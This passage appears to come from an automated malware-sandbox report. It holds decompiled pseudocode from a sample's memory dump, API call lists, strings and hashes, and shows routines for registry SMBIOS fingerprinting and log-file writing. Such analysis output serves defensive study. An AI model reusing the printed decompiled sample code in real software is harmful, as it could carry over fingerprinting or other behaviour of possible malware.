                                                                    0x00e8933a
                                                                    0x00e8939d
                                                                    0x00e8939d
                                                                    0x00000000
                                                                    0x00e8933c
                                                                    0x00e8933c
                                                                    0x00000000
                                                                    0x00e89343
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e8933c
                                                                    0x00e8933a
                                                                    0x00000000
                                                                    0x00e8925d
                                                                    0x00e89261
                                                                    0x00e8927b
                                                                    0x00e8927b
                                                                    0x00000000
                                                                    0x00e89261
                                                                    0x00e89206
                                                                    0x00e8920a
                                                                    0x00e8927e
                                                                    0x00e89280
                                                                    0x00e89282
                                                                    0x00e89282
                                                                    0x00e89284
                                                                    0x00e89284
                                                                    0x00e89287
                                                                    0x00e89287
                                                                    0x00e89289
                                                                    0x00e8928a
                                                                    0x00e89290
                                                                    0x00e89290
                                                                    0x00e89293
                                                                    0x00e8929a
                                                                    0x00e8929d
                                                                    0x00e892a6
                                                                    0x00e892ac
                                                                    0x00e892b1
                                                                    0x00e892b1
                                                                    0x00e892ba
                                                                    0x00000000
                                                                    0x00e892ba
                                                                    0x00e89224
                                                                    0x00e89224
                                                                    0x00e89235
                                                                    0x00000000
                                                                    0x00e89237
                                                                    0x00e89237
                                                                    0x00e892bd
                                                                    0x00e892bd
                                                                    0x00e892bd
                                                                    0x00e89235
                                                                    0x00e8920a
                                                                    0x00e892bf
                                                                    0x00e892c2
                                                                    0x00e892c3
                                                                    0x00e892c3
                                                                    0x00e892c6
                                                                    0x00e892c7
                                                                    0x00e892ce
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e892d0
                                                                    0x00e892d0
                                                                    0x00e892d3
                                                                    0x00e892dc
                                                                    0x00e892df
                                                                    0x00e892e4
                                                                    0x00e892e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e892e7
                                                                    0x00e892ed
                                                                    0x00e892f0
                                                                    0x00e892f0
                                                                    0x00e892f5
                                                                    0x00e892fd
                                                                    0x00e892fd
                                                                    0x00e8914b
                                                                    0x00e8914e
                                                                    0x00e89243
                                                                    0x00e8924a
                                                                    0x00e8915e
                                                                    0x00e8915e
                                                                    0x00e89167
                                                                    0x00e89173
                                                                    0x00e89175
                                                                    0x00e8917a
                                                                    0x00e891a8
                                                                    0x00000000
                                                                    0x00e8917c
                                                                    0x00e8917f
                                                                    0x00e89186
                                                                    0x00e89186
                                                                    0x00e8917a
                                                                    0x00e8914e
                                                                    0x00e89306
                                                                    0x00e8931e
                                                                    0x00e89110
                                                                    0x00e89111
                                                                    0x00e89129
                                                                    0x00e89129
                                                                    0x00000000

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\mssmbios\Data,00000000,00000001,?), ref: 00E89106
                                                                    • SetLastError.KERNEL32(00000000), ref: 00E89111
                                                                    • RegQueryValueExW.ADVAPI32(?,SMBiosData,00000000,?,00000000,?), ref: 00E8913E
                                                                    • GetProcessHeap.KERNEL32 ref: 00E8915E
                                                                    • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 00E8916D
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E89186
                                                                    • SetLastError.KERNEL32(?), ref: 00E89306
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorHeapLast$AllocCloseOpenProcessQueryValue
                                                                    • String ID: %s $(Desktop)$(Laptop)$(Low Profile Desktop)$(Mini Tower)$(Notebook)$(Other)$(Portable)$(Sub Notebook)$(Tower)$(Unknown)$SMBiosData$SYSTEM\CurrentControlSet\Services\mssmbios\Data$System manufacturer
                                                                    • API String ID: 1958120126-2478689233
                                                                    • Opcode ID: 9429a0157b1458c308d1568623c9e9ed40b0b4a7f131ef30cd1110990b4eb52f
                                                                    • Instruction ID: dc9ea919871dbbd826dac164f886aec329a998a9fc3397b45aeb427c81060494
                                                                    • Opcode Fuzzy Hash: 9429a0157b1458c308d1568623c9e9ed40b0b4a7f131ef30cd1110990b4eb52f
                                                                    • Instruction Fuzzy Hash: 15810771D04259EFCF109F95AC45AFDBBB5FB45305F28106AE84EB7162C3329906CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E00E68470(void* __ebx, signed int __ecx, signed int __edx, char _a4, void* _a24, intOrPtr _a28, char _a32) {
                                                                    				long _v8;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				struct _OVERLAPPED* _v24;
                                                                    				struct _OVERLAPPED* _v28;
                                                                    				char _v44;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int** _v56;
                                                                    				intOrPtr _v60;
                                                                    				struct _OVERLAPPED* _v64;
                                                                    				struct _OVERLAPPED* _v68;
                                                                    				char _v84;
                                                                    				struct _OVERLAPPED* _v88;
                                                                    				struct _OVERLAPPED* _v92;
                                                                    				char _v108;
                                                                    				char _v132;
                                                                    				char _v156;
                                                                    				void** _v168;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t110;
                                                                    				signed int _t111;
                                                                    				intOrPtr _t115;
                                                                    				void* _t117;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr _t129;
                                                                    				intOrPtr _t132;
                                                                    				intOrPtr* _t133;
                                                                    				void* _t140;
                                                                    				short* _t141;
                                                                    				intOrPtr* _t143;
                                                                    				intOrPtr* _t164;
                                                                    				short* _t168;
                                                                    				intOrPtr _t173;
                                                                    				intOrPtr _t174;
                                                                    				signed int* _t196;
                                                                    				intOrPtr _t198;
                                                                    				signed int** _t213;
                                                                    				HANDLE* _t218;
                                                                    				signed int _t220;
                                                                    				signed int _t221;
                                                                    				signed int _t222;
                                                                    				signed int _t223;
                                                                    				signed int _t225;
                                                                    				void** _t227;
                                                                    				signed int _t229;
                                                                    				intOrPtr* _t230;
                                                                    				void* _t231;
                                                                    				signed int _t233;
                                                                    				signed int _t234;
                                                                    				void* _t236;
                                                                    				void* _t237;
                                                                    				void* _t238;
                                                                    
                                                                    				_t177 = __ecx;
                                                                    				_t176 = __ebx;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xec73a3);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t237 = _t236 - 0x8c;
                                                                    				_t110 =  *0xeef074; // 0x2b749d79
                                                                    				_t111 = _t110 ^ _t234;
                                                                    				_v20 = _t111;
                                                                    				_push(_t111);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_v52 = __edx;
                                                                    				_t225 = __ecx;
                                                                    				_t216 = 0;
                                                                    				_v48 = 0;
                                                                    				_v8 = 0;
                                                                    				if( *0xeef9d6 != 0) {
                                                                    					L24:
                                                                    					_v8 = 0xffffffff;
                                                                    					E00E59AF0(_t176,  &_a4, _t216);
                                                                    					 *[fs:0x0] = _v16;
                                                                    					return E00EA7663(_v20 ^ _t234);
                                                                    				} else {
                                                                    					_t115 =  *0xf2c138; // 0x0
                                                                    					_v60 =  *((intOrPtr*)(_t115 + __ecx * 4));
                                                                    					_t117 = E00EA5E4B( *((intOrPtr*)(_t115 + __ecx * 4)));
                                                                    					_t238 = _t237 + 4;
                                                                    					if(_t117 != 0) {
                                                                    						_push(_t117);
                                                                    						E00EA5F4D(__ebx, _t177, __edx, 0, _t225);
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						_push(_t234);
                                                                    						_push(_t225);
                                                                    						_t227 = _v168;
                                                                    						_push(0);
                                                                    						_t218 =  &(_t227[1]);
                                                                    						while(WaitForMultipleObjects(2, _t218, 0, 0xffffffff) == 0) {
                                                                    							ReadFile(_t227[3], _t227[9], _t227[6], _t227[8], _t227[4]);
                                                                    							SetEvent( *_t227);
                                                                    						}
                                                                    						CloseHandle(_t227[2]);
                                                                    						CloseHandle( *_t227);
                                                                    						CloseHandle( *_t218);
                                                                    						_push(0x28);
                                                                    						E00EA7674(_t227);
                                                                    						return 0;
                                                                    					} else {
                                                                    						_v8 = 1;
                                                                    						_t208 = _v52;
                                                                    						if( *_v52 != _t117) {
                                                                    							_t174 =  *0xf2c114; // 0x0
                                                                    							E00E6EFA0(_t174 + _t225 * 8, _t208, _t208);
                                                                    						}
                                                                    						_t128 =  *0xf2c114; // 0x0
                                                                    						_t229 = _t225 << 3;
                                                                    						_v52 = _t229;
                                                                    						_t129 =  *((intOrPtr*)(_t229 + _t128 + 4));
                                                                    						if(_t129 > _a28 || _a32 != 0 && _t129 != 0) {
                                                                    							_v28 = 0;
                                                                    							_v24 = 0;
                                                                    							_v28 = 0;
                                                                    							_v24 = 7;
                                                                    							_v44 = 0;
                                                                    							L00E59930(_t176,  &_v44, _t216, _t229, 0xed9c6c, 0);
                                                                    							_v8 = 2;
                                                                    							_t132 =  *0xf2c114; // 0x0
                                                                    							_t133 =  *((intOrPtr*)(_t229 + _t132));
                                                                    							_t230 =  *_t133;
                                                                    							if(_t230 != _t133) {
                                                                    								do {
                                                                    									_t214 =  *((intOrPtr*)(_t230 + 8));
                                                                    									_v108 = 0;
                                                                    									_t164 =  *((intOrPtr*)(_t230 + 8));
                                                                    									_v92 = 0;
                                                                    									_v88 = 0;
                                                                    									_v92 = 0;
                                                                    									_v88 = 7;
                                                                    									_v56 = _t164 + 2;
                                                                    									do {
                                                                    										_t198 =  *_t164;
                                                                    										_t164 = _t164 + 2;
                                                                    									} while (_t198 != 0);
                                                                    									L00E59930(_t176,  &_v108, _t216, _t230, _t214, _t164 - _v56 >> 1);
                                                                    									_v8 = 4;
                                                                    									_t168 = E00E59260( &_v108, 0xed9c64);
                                                                    									_v68 = 0;
                                                                    									_v64 = 0;
                                                                    									_t223 = _t216 | 0x00000001;
                                                                    									asm("movups xmm0, [eax]");
                                                                    									asm("movups [ebp-0x50], xmm0");
                                                                    									asm("movq xmm0, [eax+0x10]");
                                                                    									 *_t168 = 0;
                                                                    									 *(_t168 + 0x10) = 0;
                                                                    									 *(_t168 + 0x14) = 7;
                                                                    									asm("movq [ebp-0x40], xmm0");
                                                                    									_v48 = _t223;
                                                                    									E00E72E40(_t176,  &_v44,  &_v84);
                                                                    									_t216 = _t223 & 0xfffffffe;
                                                                    									_v48 = _t216;
                                                                    									_v8 = 3;
                                                                    									E00E59AF0(_t176,  &_v84, _t216);
                                                                    									_v8 = 2;
                                                                    									E00E59AF0(_t176,  &_v108, _t216);
                                                                    									_t173 =  *0xf2c114; // 0x0
                                                                    									_t230 =  *_t230;
                                                                    								} while (_t230 !=  *((intOrPtr*)(_v52 + _t173)));
                                                                    							}
                                                                    							_t135 =  >=  ? _a4 :  &_a4;
                                                                    							_t231 = CreateFileW( >=  ? _a4 :  &_a4, 0x10000000, 1, 0, 4, 0x80, 0);
                                                                    							if(_t231 == 0xffffffff || _t231 == 0) {
                                                                    								_t232 = E00E83430(_t176,  &_v156, GetLastError(), _t216, _t231);
                                                                    								_v8 = 5;
                                                                    								_t140 = E00E73EF0(_t176,  &_v132, L"Invaild Handle in log saving ");
                                                                    								_t238 = _t238 + 4;
                                                                    								_v8 = 7;
                                                                    								_t141 = E00E59260(_t140, " ");
                                                                    								_v68 = 0;
                                                                    								_t220 = _t216 | 0x00000002;
                                                                    								_v64 = 0;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x50], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x40], xmm0");
                                                                    								 *(_t141 + 0x10) = 0;
                                                                    								 *(_t141 + 0x14) = 7;
                                                                    								 *_t141 = 0;
                                                                    								_v48 = _t220;
                                                                    								_v8 = 8;
                                                                    								_t143 = E00E77B80( &_v108, _v56,  &_v84, _t138,  &_a4);
                                                                    								_t221 = _t220 | 0x00000004;
                                                                    								_v48 = _t221;
                                                                    								if( *((intOrPtr*)(_t143 + 0x14)) >= 8) {
                                                                    									_t143 =  *_t143;
                                                                    								}
                                                                    								E00E59EB0(_t176, _t143, 1, _t221, _t232);
                                                                    								_t222 = _t221 & 0xfffffffb;
                                                                    								_v48 = _t222;
                                                                    								_v8 = 7;
                                                                    								E00E59AF0(_t176,  &_v108, _t222);
                                                                    								_t216 = _t222 & 0xfffffffd;
                                                                    								_v48 = _t222 & 0xfffffffd;
                                                                    								_v8 = 6;
                                                                    								E00E59AF0(_t176,  &_v84, _t222 & 0xfffffffd);
                                                                    								_v8 = 5;
                                                                    								E00E59AF0(_t176,  &_v132, _t222 & 0xfffffffd);
                                                                    								_v8 = 2;
                                                                    								E00E59AF0(_t176,  &_v156, _t216);
                                                                    							} else {
                                                                    								_push(2);
                                                                    								asm("xorps xmm0, xmm0");
                                                                    								asm("movlpd [0xf2c308], xmm0");
                                                                    								SetFilePointerEx(_t231,  *0xf2c308,  *0xf2c30c, 0xf2c310);
                                                                    								_t154 =  >=  ? _v44 :  &_v44;
                                                                    								WriteFile(_t231,  >=  ? _v44 :  &_v44, _v28 + _v28, 0xf2c2b8, 0);
                                                                    								FlushFileBuffers(_t231);
                                                                    								CloseHandle(_t231);
                                                                    								_t213 = _v52 +  *0xf2c114;
                                                                    								_v56 = _t213;
                                                                    								_t196 =  *_t213;
                                                                    								 *(_t196[1]) = 0;
                                                                    								_t216 =  *_t196;
                                                                    								if(_t216 != 0) {
                                                                    									do {
                                                                    										_t233 =  *_t216;
                                                                    										E00EAEBD8( *((intOrPtr*)(_t216 + 8)));
                                                                    										_push(0xc);
                                                                    										E00EA7674(_t216);
                                                                    										_t238 = _t238 + 0xc;
                                                                    										_t216 = _t233;
                                                                    									} while (_t233 != 0);
                                                                    									_t213 = _v56;
                                                                    								}
                                                                    								 *( *_t213) =  *_t213;
                                                                    								( *_t213)[1] =  *_t213;
                                                                    								_t213[1] = 0;
                                                                    							}
                                                                    							_v8 = 1;
                                                                    							E00E59AF0(_t176,  &_v44, _t216);
                                                                    						}
                                                                    						_v8 = 0;
                                                                    						E00EA5E5C(_v60);
                                                                    						goto L24;
                                                                    					}
                                                                    				}
                                                                    			}


























































                                                                    0x00e68470
                                                                    0x00e68470
                                                                    0x00e68473
                                                                    0x00e68475
                                                                    0x00e68480
                                                                    0x00e68481
                                                                    0x00e68487
                                                                    0x00e6848c
                                                                    0x00e6848e
                                                                    0x00e68493
                                                                    0x00e68497
                                                                    0x00e6849d
                                                                    0x00e684a0
                                                                    0x00e684a2
                                                                    0x00e684a4
                                                                    0x00e684a7
                                                                    0x00e684b1
                                                                    0x00e6880d
                                                                    0x00e6880d
                                                                    0x00e68817
                                                                    0x00e6881f
                                                                    0x00e68836
                                                                    0x00e684b7
                                                                    0x00e684b7
                                                                    0x00e684c0
                                                                    0x00e684c3
                                                                    0x00e684c8
                                                                    0x00e684cd
                                                                    0x00e68837
                                                                    0x00e68838
                                                                    0x00e6883d
                                                                    0x00e6883e
                                                                    0x00e6883f
                                                                    0x00e68840
                                                                    0x00e68843
                                                                    0x00e68844
                                                                    0x00e68847
                                                                    0x00e6884c
                                                                    0x00e6885a
                                                                    0x00e6886f
                                                                    0x00e68877
                                                                    0x00e6888a
                                                                    0x00e68891
                                                                    0x00e68899
                                                                    0x00e688a1
                                                                    0x00e688a7
                                                                    0x00e688aa
                                                                    0x00e688b7
                                                                    0x00e684d3
                                                                    0x00e684d3
                                                                    0x00e684d7
                                                                    0x00e684dc
                                                                    0x00e684de
                                                                    0x00e684e7
                                                                    0x00e684e7
                                                                    0x00e684ec
                                                                    0x00e684f1
                                                                    0x00e684f4
                                                                    0x00e684f7
                                                                    0x00e684fe
                                                                    0x00e68514
                                                                    0x00e6851c
                                                                    0x00e6852b
                                                                    0x00e68532
                                                                    0x00e68539
                                                                    0x00e6853d
                                                                    0x00e68542
                                                                    0x00e68546
                                                                    0x00e6854b
                                                                    0x00e6854e
                                                                    0x00e68552
                                                                    0x00e68560
                                                                    0x00e68560
                                                                    0x00e68565
                                                                    0x00e68569
                                                                    0x00e6856b
                                                                    0x00e68572
                                                                    0x00e68579
                                                                    0x00e68583
                                                                    0x00e6858a
                                                                    0x00e68590
                                                                    0x00e68590
                                                                    0x00e68593
                                                                    0x00e68596
                                                                    0x00e685a5
                                                                    0x00e685aa
                                                                    0x00e685b6
                                                                    0x00e685bd
                                                                    0x00e685c4
                                                                    0x00e685cb
                                                                    0x00e685ce
                                                                    0x00e685d1
                                                                    0x00e685d5
                                                                    0x00e685da
                                                                    0x00e685e0
                                                                    0x00e685e7
                                                                    0x00e685f2
                                                                    0x00e685f7
                                                                    0x00e685fa
                                                                    0x00e685ff
                                                                    0x00e68602
                                                                    0x00e68605
                                                                    0x00e6860c
                                                                    0x00e68611
                                                                    0x00e68618
                                                                    0x00e6861d
                                                                    0x00e68625
                                                                    0x00e68627
                                                                    0x00e68560
                                                                    0x00e68639
                                                                    0x00e68654
                                                                    0x00e68659
                                                                    0x00e68726
                                                                    0x00e68728
                                                                    0x00e68738
                                                                    0x00e6873d
                                                                    0x00e68740
                                                                    0x00e6874b
                                                                    0x00e68752
                                                                    0x00e68759
                                                                    0x00e6875c
                                                                    0x00e68763
                                                                    0x00e68766
                                                                    0x00e6876a
                                                                    0x00e6876f
                                                                    0x00e68774
                                                                    0x00e6877b
                                                                    0x00e68782
                                                                    0x00e68785
                                                                    0x00e68788
                                                                    0x00e68797
                                                                    0x00e6879c
                                                                    0x00e6879f
                                                                    0x00e687a6
                                                                    0x00e687a8
                                                                    0x00e687a8
                                                                    0x00e687ae
                                                                    0x00e687b3
                                                                    0x00e687b6
                                                                    0x00e687b9
                                                                    0x00e687c0
                                                                    0x00e687c5
                                                                    0x00e687c8
                                                                    0x00e687cb
                                                                    0x00e687d2
                                                                    0x00e687d7
                                                                    0x00e687de
                                                                    0x00e687e3
                                                                    0x00e687ed
                                                                    0x00e68667
                                                                    0x00e68667
                                                                    0x00e6866e
                                                                    0x00e68671
                                                                    0x00e68686
                                                                    0x00e686a0
                                                                    0x00e686a7
                                                                    0x00e686ae
                                                                    0x00e686b5
                                                                    0x00e686be
                                                                    0x00e686c4
                                                                    0x00e686c7
                                                                    0x00e686cc
                                                                    0x00e686d2
                                                                    0x00e686d6
                                                                    0x00e686e0
                                                                    0x00e686e3
                                                                    0x00e686e5
                                                                    0x00e686ea
                                                                    0x00e686ed
                                                                    0x00e686f2
                                                                    0x00e686f5
                                                                    0x00e686f7
                                                                    0x00e686fb
                                                                    0x00e686fb
                                                                    0x00e68700
                                                                    0x00e68704
                                                                    0x00e68707
                                                                    0x00e68707
                                                                    0x00e687f2
                                                                    0x00e687f9
                                                                    0x00e687f9
                                                                    0x00e687fe
                                                                    0x00e68805
                                                                    0x00000000
                                                                    0x00e6880a
                                                                    0x00e684cd

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000004,00000080,00000000,00ED9C6C,00000000,00000000), ref: 00E6864E
                                                                    • SetFilePointerEx.KERNEL32(00000000,00F2C310,00000002), ref: 00E68686
                                                                    • WriteFile.KERNEL32(00000000,?,?,00F2C2B8,00000000), ref: 00E686A7
                                                                    • FlushFileBuffers.KERNEL32(00000000,?,00F2C2B8,00000000), ref: 00E686AE
                                                                    • CloseHandle.KERNEL32(00000000,?,00F2C2B8,00000000), ref: 00E686B5
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E68805
                                                                      • Part of subcall function 00EAEBD8: _free.LIBCMT ref: 00EAEBEB
                                                                    • GetLastError.KERNEL32 ref: 00E68713
                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF,00000000,00000001,?,00000000,00000000), ref: 00E68852
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E6886F
                                                                    • SetEvent.KERNEL32(?,?,00000000,00000000), ref: 00E68877
                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF,?,00000000,00000000), ref: 00E68884
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00E68891
                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00E68899
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00E688A1
                                                                    Strings
                                                                    • Invaild Handle in log saving , xrefs: 00E68730
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$MultipleObjectsWait$BuffersCreateErrorEventFlushLastMtx_unlockPointerReadWrite_free
                                                                    • String ID: Invaild Handle in log saving
                                                                    • API String ID: 636126068-1891806280
                                                                    • Opcode ID: 469f10d70f7ccf581ef07c0318d18b656f60ee47e2fabdbbf666eca233324c9f
                                                                    • Instruction ID: 5cc1122fff3d242e9b047722284ec7ec6d64d8298c3705eac27c707573061e0d
                                                                    • Opcode Fuzzy Hash: 469f10d70f7ccf581ef07c0318d18b656f60ee47e2fabdbbf666eca233324c9f
                                                                    • Instruction Fuzzy Hash: CFD1AB71901248DFDB10DFA8DD49BDEBBB0FF09304F144269E405BB2A2DB75AA09CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EBDE6B
                                                                      • Part of subcall function 00EB5945: HeapFree.KERNEL32(00000000,00000000,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(?,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?,?), ref: 00EB596D
                                                                    • _free.LIBCMT ref: 00EBDE7D
                                                                    • _free.LIBCMT ref: 00EBDE8F
                                                                    • _free.LIBCMT ref: 00EBDEA1
                                                                    • _free.LIBCMT ref: 00EBDEB3
                                                                    • _free.LIBCMT ref: 00EBDEC5
                                                                    • _free.LIBCMT ref: 00EBDED7
                                                                    • _free.LIBCMT ref: 00EBDEE9
                                                                    • _free.LIBCMT ref: 00EBDEFB
                                                                    • _free.LIBCMT ref: 00EBDF0D
                                                                    • _free.LIBCMT ref: 00EBDF1F
                                                                    • _free.LIBCMT ref: 00EBDF31
                                                                    • _free.LIBCMT ref: 00EBDF43
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 4f53bcb0e7bf1b9177c2c3873ae13f11d94386b22b1e18c1c769b3466c1a3894
                                                                    • Instruction ID: 069eea709c499667e3f1c057061acb67776676cfd262f58ec44523a4f557760c
                                                                    • Opcode Fuzzy Hash: 4f53bcb0e7bf1b9177c2c3873ae13f11d94386b22b1e18c1c769b3466c1a3894
                                                                    • Instruction Fuzzy Hash: 68212D33509A88EFC670EBA5E8C5DA733F9AB813307642809F055FB561D631FC844A10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EBEB9C
                                                                      • Part of subcall function 00EB5945: HeapFree.KERNEL32(00000000,00000000,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(?,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?,?), ref: 00EB596D
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDE6B
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDE7D
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDE8F
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEA1
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEB3
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEC5
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDED7
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEE9
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEFB
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF0D
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF1F
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF31
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF43
                                                                    • _free.LIBCMT ref: 00EBEBBE
                                                                    • _free.LIBCMT ref: 00EBEBD3
                                                                    • _free.LIBCMT ref: 00EBEBDE
                                                                    • _free.LIBCMT ref: 00EBEC00
                                                                    • _free.LIBCMT ref: 00EBEC13
                                                                    • _free.LIBCMT ref: 00EBEC21
                                                                    • _free.LIBCMT ref: 00EBEC2C
                                                                    • _free.LIBCMT ref: 00EBEC64
                                                                    • _free.LIBCMT ref: 00EBEC6B
                                                                    • _free.LIBCMT ref: 00EBEC88
                                                                    • _free.LIBCMT ref: 00EBECA0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 75f2e6b23f971d3311668af6c3ce4fb870fc730f7989d53d43917ecf5dd4cf2e
                                                                    • Instruction ID: 9cccbc79d5801e26be5ccde4fcbe271c2dfbe35f8830500430e7fcec926b9a8f
                                                                    • Opcode Fuzzy Hash: 75f2e6b23f971d3311668af6c3ce4fb870fc730f7989d53d43917ecf5dd4cf2e
                                                                    • Instruction Fuzzy Hash: 57313932604644DFEB71AB79D945BE7B7E9AF81324F146829E065F6261DF30EC80CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3907804496
